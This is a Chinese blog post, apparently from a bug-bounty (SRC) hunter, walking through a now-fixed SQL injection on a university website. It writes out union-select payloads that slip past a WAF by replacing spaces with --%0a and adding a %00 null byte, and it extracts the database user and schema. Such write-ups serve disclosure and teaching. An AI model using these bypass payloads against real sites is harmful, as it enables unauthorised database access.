记一次挖掘某SRC漏洞Bypass的思路

admin
admin
admin
140413
文章
117
评论
2022年3月24日02:47:46评论83 views字数 675阅读2分15秒阅读模式

记一次挖掘某SRC漏洞Bypass的思路

漏洞已提交某SRC 已修复 只是分享一下自己挖掘过程的思路来提供大家学习

打开网站,www.xxedu.cn 某大学国家网络安全学院  发现最上面有个输入框


记一次挖掘某SRC漏洞Bypass的思路


判断注入


记一次挖掘某SRC漏洞Bypass的思路


输入一个单引号


记一次挖掘某SRC漏洞Bypass的思路


页面报错 


难道就这样放弃吗  不


记一次挖掘某SRC漏洞Bypass的思路


冷静下抽根华子,输入两个试试 


记一次挖掘某SRC漏洞Bypass的思路


正常

判断列数

首先闭合,这里程序使用的是thinkphp,查询时候会用小括号包裹,所以首先用')闭合

1 keywords=1') %23


记一次挖掘某SRC漏洞Bypass的思路



order by x被拦截,用--%0a代替空格即可


记一次挖掘某SRC漏洞Bypass的思路


27报错代表只有26行


记一次挖掘某SRC漏洞Bypass的思路


联合注入

直接上union select会一直卡着没有任何返回


记一次挖掘某SRC漏洞Bypass的思路


把空格都改为--%0a,成功响应


记一次挖掘某SRC漏洞Bypass的思路


在select跟1,2,3...之间用两个--%0a负责会无响应

1 =1')‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1

6,17,18,19,20,21,22,23,24,25,26

但是发现还是响应错误,这里就猜测是错误跟拦截响应都相同


记一次挖掘某SRC漏洞Bypass的思路


联合注入Bypass

在1后面加上%00并url编码,原理是waf把空字节认为是结束导致了后面的语句可以绕过

1 :1%00')‐‐%0aunion‐‐%0aselect‐‐%0a‐‐%0a1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,

16,17,18,19,20,21,22,23,24,25,26

2 :%23


记一次挖掘某SRC漏洞Bypass的思路

得到回显点为4


记一次挖掘某SRC漏洞Bypass的思路


使用user--%0a()得到用户cse


记一次挖掘某SRC漏洞Bypass的思路


SCHEMA--%0a()得到数据库cse


记一次挖掘某SRC漏洞Bypass的思路


记一次挖掘某SRC漏洞Bypass的思路

本文始发于微信公众号(疯猫网络):记一次挖掘某SRC漏洞Bypass的思路

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月24日02:47:46
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次挖掘某SRC漏洞Bypass的思路https://cn-sec.com/archives/504826.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息